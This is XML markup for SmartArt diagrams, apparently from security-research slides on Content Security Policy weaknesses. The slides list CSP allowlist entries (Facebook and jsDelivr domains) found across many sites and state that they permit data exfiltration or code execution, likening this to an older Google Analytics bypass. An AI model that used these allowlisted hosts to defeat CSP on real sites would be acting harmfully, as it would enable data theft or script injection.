    <dgm:cxn modelId="{500E4787-A651-49D3-AD50-5657329C998D}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{877B9B36-37C2-42AB-B290-2D5CFBAE4F98}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E7553FE7-7BC2-4478-8A8E-F77803516838}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{17797374-B6AF-4211-9102-62BEF26471E3}" type="presParOf" srcId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" destId="{3602B78D-1E64-41C4-81A9-043B057A6F0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{26FEDEF2-992D-4619-8DD4-76B3A9C10F6D}" type="presParOf" srcId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" destId="{2671FA71-80B5-47F9-86C3-32D2F224EDB1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{B58721A7-46F8-403F-8672-C5615A37ACBD}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{88F358FB-2408-41AF-A257-5964FED42C08}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3C035B1C-524E-42FE-A7C0-A18E92081B51}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A159EA3F-C548-4124-9CEE-645DB03DAB95}" type="presParOf" srcId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" destId="{87D9E374-6DBC-4B93-8F23-73523EB7F9DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{9C1D5231-FCF3-4E9E-B5D1-D92681DE8FE7}" type="presParOf" srcId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" destId="{5630021E-01C2-4224-B2FD-13882086D125}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7E1B4005-78DE-4451-B04E-074D01ED54A2}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{F01B13FD-4A30-4650-996B-814F40E90546}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{971F1CF2-79DC-4602-A0B8-8C361C834814}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{C780EBB7-6784-4FD0-99F0-12D3E92C2169}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7C39714B-49DB-4EB4-9522-A696AEF9F104}" type="presParOf" srcId="{C780EBB7-6784-4FD0-99F0-12D3E92C2169}" destId="{1EF2ECFB-C125-4897-B28E-5ADDA643D3F6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{DA816FC4-F66A-443D-9FB9-959C7A9272AD}" type="presParOf" srcId="{C780EBB7-6784-4FD0-99F0-12D3E92C2169}" destId="{EC0ED00C-8439-40A4-82FB-7014EB968E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C77883-98B3-45AA-8230-B250F208076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EFD7051-D69E-47F6-99E8-1DC24B435DFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>~2750 Sites in my DB</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{721DEF2F-F416-41A5-A05F-758F99FDC0C8}" type="parTrans" cxnId="{7BD6C007-8DFD-4C62-B453-48140D3C0740}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{755D3C55-1B00-43B7-B8A9-19DB61B8AFB8}" type="sibTrans" cxnId="{7BD6C007-8DFD-4C62-B453-48140D3C0740}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>Symptoms: </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0" err="1"/>
            <a:t>xxxx-src</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>: *.facebook.com, *.facebook.net</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE15717C-0244-4042-8917-61342E9C39EB}" type="parTrans" cxnId="{F1768B82-27A8-42E6-B9EE-B515186008BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56F4FFA3-1D9A-4E57-98E9-5575C45D8158}" type="sibTrans" cxnId="{F1768B82-27A8-42E6-B9EE-B515186008BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>Can be used to Exfiltrate data</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1873F028-2796-4F98-8265-F3360B812BE8}" type="parTrans" cxnId="{09BEC6BA-4684-4792-B590-7374B06F72D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84F69CA5-A867-42F3-A080-4906F780782F}" type="sibTrans" cxnId="{09BEC6BA-4684-4792-B590-7374B06F72D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{603EAE19-D084-45BB-B6C3-7ACC027B0E7D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>Pretty much like the old </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>www.google-analytics.com</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t> bypass</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3556A61F-C9DA-4186-A48E-B1549CDD32A1}" type="parTrans" cxnId="{98D881E8-08E4-4F32-85BE-C3476A57CC5A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{61C3369B-6006-4F4F-9114-9264B88C39C0}" type="sibTrans" cxnId="{98D881E8-08E4-4F32-85BE-C3476A57CC5A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" type="pres">
      <dgm:prSet presAssocID="{09C77883-98B3-45AA-8230-B250F208076F}" presName="vert0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D760DC72-46C1-4898-AD8D-16575EA3CD55}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3D4D1DD2-1902-47AC-904F-9723F18DB6AD}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="tx1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16FADC84-2696-4969-9978-EE4ACD836C5D}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{877B9B36-37C2-42AB-B290-2D5CFBAE4F98}" type="pres">
      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" type="pres">
      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3602B78D-1E64-41C4-81A9-043B057A6F0E}" type="pres">
      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="tx1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2671FA71-80B5-47F9-86C3-32D2F224EDB1}" type="pres">
      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{88F358FB-2408-41AF-A257-5964FED42C08}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{87D9E374-6DBC-4B93-8F23-73523EB7F9DB}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="tx1" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5630021E-01C2-4224-B2FD-13882086D125}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F01B13FD-4A30-4650-996B-814F40E90546}" type="pres">
      <dgm:prSet presAssocID="{603EAE19-D084-45BB-B6C3-7ACC027B0E7D}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C780EBB7-6784-4FD0-99F0-12D3E92C2169}" type="pres">
      <dgm:prSet presAssocID="{603EAE19-D084-45BB-B6C3-7ACC027B0E7D}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1EF2ECFB-C125-4897-B28E-5ADDA643D3F6}" type="pres">
      <dgm:prSet presAssocID="{603EAE19-D084-45BB-B6C3-7ACC027B0E7D}" presName="tx1" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC0ED00C-8439-40A4-82FB-7014EB968ED7}" type="pres">
      <dgm:prSet presAssocID="{603EAE19-D084-45BB-B6C3-7ACC027B0E7D}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7BD6C007-8DFD-4C62-B453-48140D3C0740}" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" srcOrd="0" destOrd="0" parTransId="{721DEF2F-F416-41A5-A05F-758F99FDC0C8}" sibTransId="{755D3C55-1B00-43B7-B8A9-19DB61B8AFB8}"/>
    <dgm:cxn modelId="{4A4E020C-A450-4703-8F9E-BEAEAA44A6DF}" type="presOf" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{95643A34-3925-496D-828E-03EE978991E4}" type="presOf" srcId="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" destId="{3D4D1DD2-1902-47AC-904F-9723F18DB6AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{EDA1304F-4B45-4447-8D9D-C1CB904F9026}" type="presOf" srcId="{603EAE19-D084-45BB-B6C3-7ACC027B0E7D}" destId="{1EF2ECFB-C125-4897-B28E-5ADDA643D3F6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{F1768B82-27A8-42E6-B9EE-B515186008BE}" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" srcOrd="1" destOrd="0" parTransId="{FE15717C-0244-4042-8917-61342E9C39EB}" sibTransId="{56F4FFA3-1D9A-4E57-98E9-5575C45D8158}"/>
    <dgm:cxn modelId="{6B54A19B-8F83-4143-86E9-66895FFD5B37}" type="presOf" srcId="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" destId="{3602B78D-1E64-41C4-81A9-043B057A6F0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{09BEC6BA-4684-4792-B590-7374B06F72D8}" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" srcOrd="2" destOrd="0" parTransId="{1873F028-2796-4F98-8265-F3360B812BE8}" sibTransId="{84F69CA5-A867-42F3-A080-4906F780782F}"/>
    <dgm:cxn modelId="{98D881E8-08E4-4F32-85BE-C3476A57CC5A}" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{603EAE19-D084-45BB-B6C3-7ACC027B0E7D}" srcOrd="3" destOrd="0" parTransId="{3556A61F-C9DA-4186-A48E-B1549CDD32A1}" sibTransId="{61C3369B-6006-4F4F-9114-9264B88C39C0}"/>
    <dgm:cxn modelId="{07FDB9F3-A009-4B26-A11E-041B398C1E90}" type="presOf" srcId="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" destId="{87D9E374-6DBC-4B93-8F23-73523EB7F9DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A320D686-B34F-42E9-A68C-F031782B9AF0}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{D760DC72-46C1-4898-AD8D-16575EA3CD55}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{706C4974-41C2-4849-856C-FFFC6B58020F}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{DE8BAE84-8EE4-471A-9B38-9FF9F225896E}" type="presParOf" srcId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" destId="{3D4D1DD2-1902-47AC-904F-9723F18DB6AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{6DA14C0F-0BEC-4054-9E34-64922B63122C}" type="presParOf" srcId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" destId="{16FADC84-2696-4969-9978-EE4ACD836C5D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{500E4787-A651-49D3-AD50-5657329C998D}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{877B9B36-37C2-42AB-B290-2D5CFBAE4F98}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E7553FE7-7BC2-4478-8A8E-F77803516838}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{17797374-B6AF-4211-9102-62BEF26471E3}" type="presParOf" srcId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" destId="{3602B78D-1E64-41C4-81A9-043B057A6F0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{26FEDEF2-992D-4619-8DD4-76B3A9C10F6D}" type="presParOf" srcId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" destId="{2671FA71-80B5-47F9-86C3-32D2F224EDB1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{B58721A7-46F8-403F-8672-C5615A37ACBD}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{88F358FB-2408-41AF-A257-5964FED42C08}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3C035B1C-524E-42FE-A7C0-A18E92081B51}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A159EA3F-C548-4124-9CEE-645DB03DAB95}" type="presParOf" srcId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" destId="{87D9E374-6DBC-4B93-8F23-73523EB7F9DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{9C1D5231-FCF3-4E9E-B5D1-D92681DE8FE7}" type="presParOf" srcId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" destId="{5630021E-01C2-4224-B2FD-13882086D125}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7E1B4005-78DE-4451-B04E-074D01ED54A2}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{F01B13FD-4A30-4650-996B-814F40E90546}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{971F1CF2-79DC-4602-A0B8-8C361C834814}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{C780EBB7-6784-4FD0-99F0-12D3E92C2169}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7C39714B-49DB-4EB4-9522-A696AEF9F104}" type="presParOf" srcId="{C780EBB7-6784-4FD0-99F0-12D3E92C2169}" destId="{1EF2ECFB-C125-4897-B28E-5ADDA643D3F6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{DA816FC4-F66A-443D-9FB9-959C7A9272AD}" type="presParOf" srcId="{C780EBB7-6784-4FD0-99F0-12D3E92C2169}" destId="{EC0ED00C-8439-40A4-82FB-7014EB968E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C77883-98B3-45AA-8230-B250F208076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EFD7051-D69E-47F6-99E8-1DC24B435DFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>~1550 Sites in my DB</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{721DEF2F-F416-41A5-A05F-758F99FDC0C8}" type="parTrans" cxnId="{7BD6C007-8DFD-4C62-B453-48140D3C0740}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{755D3C55-1B00-43B7-B8A9-19DB61B8AFB8}" type="sibTrans" cxnId="{7BD6C007-8DFD-4C62-B453-48140D3C0740}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Symptoms: </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0" err="1">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>xxxx-src</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>: cdn.jsdelivr.com, *.jsdelivr.com</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE15717C-0244-4042-8917-61342E9C39EB}" type="parTrans" cxnId="{F1768B82-27A8-42E6-B9EE-B515186008BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56F4FFA3-1D9A-4E57-98E9-5575C45D8158}" type="sibTrans" cxnId="{F1768B82-27A8-42E6-B9EE-B515186008BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Can be used to Execute code</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1873F028-2796-4F98-8265-F3360B812BE8}" type="parTrans" cxnId="{09BEC6BA-4684-4792-B590-7374B06F72D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84F69CA5-A867-42F3-A080-4906F780782F}" type="sibTrans" cxnId="{09BEC6BA-4684-4792-B590-7374B06F72D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" type="pres">
      <dgm:prSet presAssocID="{09C77883-98B3-45AA-8230-B250F208076F}" presName="vert0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D760DC72-46C1-4898-AD8D-16575EA3CD55}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3D4D1DD2-1902-47AC-904F-9723F18DB6AD}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="tx1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16FADC84-2696-4969-9978-EE4ACD836C5D}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{877B9B36-37C2-42AB-B290-2D5CFBAE4F98}" type="pres">
